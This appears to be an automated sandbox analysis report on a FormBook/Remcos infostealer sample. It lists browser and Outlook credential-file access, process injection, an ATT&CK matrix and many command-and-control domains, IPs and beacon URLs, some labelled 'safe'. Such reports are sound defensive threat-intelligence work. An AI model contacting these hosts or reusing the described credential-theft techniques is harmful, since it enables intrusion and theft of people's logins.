                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551048 Sample: SDBARVe3d3.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 31 www.tesetturhanzade.xyz 2->31 33 zz67x.top 2->33 35 23 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 5 other signatures 2->53 10 SDBARVe3d3.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\...\SDBARVe3d3.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 SDBARVe3d3.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 wPGxKDFwovcH.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 fc.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 wPGxKDFwovcH.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 ultrawin23.shop 170.39.213.43, 49963, 49978, 49994 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved 23->37 39 papampalli.shop 162.241.85.94, 50036, 50037, 50038 OIS1US United States 23->39 41 10 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SDBARVe3d3.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos
                SDBARVe3d3.exe100%AviraTR/AD.Nekark.kgpom
                SDBARVe3d3.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU=0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/?NBfdCRyH=0a8PLTuVJQjPSrlNTcujtDihNMeO9FYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP27bmOOo50KzsRrW97hoYkm0aU0/aEWOIRhrI=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                http://www.dodsrprolev.shop/42jb/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                http://www.gokulmohan.online0%Avira URL Cloudsafe
                http://www.optimallogics.services/l7yl/?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=djThxhCXsVTaW29XXtOrXv7xIwJyr9fT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYygTJ2xilMgHX7dTLMRFf+/COIbLTgBfvWu/E=0%Avira URL Cloudsafe
                http://www.papampalli.shop/pgru/0%Avira URL Cloudsafe
                http://www.smileyface.world/k8p1/0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/?NBfdCRyH=8JknlPcTs2UijknQ0bOQpmN1M0hHcLDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1pP+ZXcAQJvFFEy7R+vzIZC0KJff7IqPUUhg=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                http://www.tesetturhanzade.xyz/ur0f/?NBfdCRyH=zogJdywBU1O1LleSauKJSsuFV/4Ok9lE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiLOby4W89Tfql961FjyGPsIlp+mbksH+4eXA=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                http://www.gokulmohan.online/ut59/0%Avira URL Cloudsafe
                http://www.optimallogics.services/l7yl/0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                http://www.smileyface.world/k8p1/?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/0%Avira URL Cloudsafe
                http://pip1-loh.com/0%Avira URL Cloudsafe
                http://www.vincemachi.net/63jz/?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                http://www.vincemachi.net/63jz/0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/0%Avira URL Cloudsafe
                https://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd90%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/0%Avira URL Cloudsafe
                http://papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VF0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/?NBfdCRyH=RSXDvmZ18TUSGah6EulyS1XswkRToS9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi/NXFftLLf3QUCIw7GC9Ov73YwEGOSCVy7Hg=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/?NBfdCRyH=8ZwuH3XLrsgkZOwzbHv8kzwaBJUvbtMyt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1siN23r0fyWsL1d4E8Hi4h+DwdtH5CMx58j2c=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                http://www.dodsrprolev.shop/42jb/?NBfdCRyH=xOvRPSdGlVcg4ggtvlNaQF7r/q5ZE7OS64NTuszpJDlgcn3f2GAJOICwQ4poJfJ85RMy/fsotNCJs0/3zrWyWPthfBhIBxngO9nzBLvphHFnKcLlmUkHPG0=&ZpEH9=TjSP5LXXbN8d40%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                smileyface.world
                		3.33.130.190
                		truetrue
                  		unknown
                  www.dodsrprolev.shop
                  		188.114.97.3
                  		truetrue
                    		unknown
                    www.deeplungatlas.org
                    		194.9.94.85
                    		truetrue
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truefalse
                        		high
                        kantinestoel.online
                        		91.184.0.200
                        		truetrue
                          		unknown
                          vincemachi.net
                          		3.33.130.190
                          		truetrue
                            		unknown
                            papampalli.shop
                            		162.241.85.94
                            		truetrue
                              		unknown
                              www.vibixx.site
                              		162.0.211.143
                              		truetrue
                                		unknown
                                zz67x.top
                                		38.47.232.194
                                		truetrue
                                  		unknown
                                  optimallogics.services
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.gokulmohan.online
                                    		104.21.64.124
                                    		truefalse
                                      		unknown
                                      www.sonoscan.org
                                      		13.248.169.48
                                      		truetrue
                                        		unknown
                                        ultrawin23.shop
                                        		170.39.213.43
                                        		truetrue
                                          		unknown
                                          www.omnibizlux.biz
                                          		167.172.133.32
                                          		truetrue
                                            		unknown
                                            www.ultrawin23.shop
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.zz67x.top
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.tangible.online
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.rka6460.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.optimallogics.services
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.papampalli.shop
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.smileyface.world
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.vincemachi.net
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown
                                                            www.tesetturhanzade.xyz
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.kantinestoel.online
                                                              		unknown
                                                              		unknownfalse
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.vibixx.site/4xim/?NBfdCRyH=0a8PLTuVJQjPSrlNTcujtDihNMeO9FYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP27bmOOo50KzsRrW97hoYkm0aU0/aEWOIRhrI=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.zz67x.top/45n6/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=djThxhCXsVTaW29XXtOrXv7xIwJyr9fT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYygTJ2xilMgHX7dTLMRFf+/COIbLTgBfvWu/E=true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.papampalli.shop/pgru/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dodsrprolev.shop/42jb/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.sonoscan.org/ew98/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.optimallogics.services/l7yl/?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU=true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ultrawin23.shop/53y2/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.smileyface.world/k8p1/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tesetturhanzade.xyz/ur0f/?NBfdCRyH=zogJdywBU1O1LleSauKJSsuFV/4Ok9lE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiLOby4W89Tfql961FjyGPsIlp+mbksH+4eXA=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.kantinestoel.online/ggvc/?NBfdCRyH=8JknlPcTs2UijknQ0bOQpmN1M0hHcLDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1pP+ZXcAQJvFFEy7R+vzIZC0KJff7IqPUUhg=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.optimallogics.services/l7yl/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.gokulmohan.online/ut59/false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.smileyface.world/k8p1/?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.deeplungatlas.org/57zf/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.vincemachi.net/63jz/?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.vincemachi.net/63jz/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.vibixx.site/4xim/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.omnibizlux.biz/jlqg/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.zz67x.top/45n6/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.kantinestoel.online/ggvc/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.omnibizlux.biz/jlqg/?NBfdCRyH=8ZwuH3XLrsgkZOwzbHv8kzwaBJUvbtMyt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1siN23r0fyWsL1d4E8Hi4h+DwdtH5CMx58j2c=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.deeplungatlas.org/57zf/?NBfdCRyH=RSXDvmZ18TUSGah6EulyS1XswkRToS9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi/NXFftLLf3QUCIw7GC9Ov73YwEGOSCVy7Hg=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.sonoscan.org/ew98/?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dodsrprolev.shop/42jb/?NBfdCRyH=xOvRPSdGlVcg4ggtvlNaQF7r/q5ZE7OS64NTuszpJDlgcn3f2GAJOICwQ4poJfJ85RMy/fsotNCJs0/3zrWyWPthfBhIBxngO9nzBLvphHFnKcLlmUkHPG0=&ZpEH9=TjSP5LXXbN8d4true
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://duckduckgo.com/chrome_newtabfc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designersGSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/ac/?q=fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/?SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/bTheSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designers?SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.gokulmohan.onlinewPGxKDFwovcH.exe, 00000008.00000002.4136828393.000000000504D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.tiro.comSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fontbureau.com/designersSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://static.loopia.se/responsive/images/iOS-72.pngfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.goodfont.co.krSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.sajatypeworks.comSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.typography.netDSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.founder.com.cn/cn/cTheSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/staff/dennis.htmSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://static.loopia.se/shared/logo/logo-loopia-white.svgfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwefc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.galapagosdesign.com/DPleaseSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
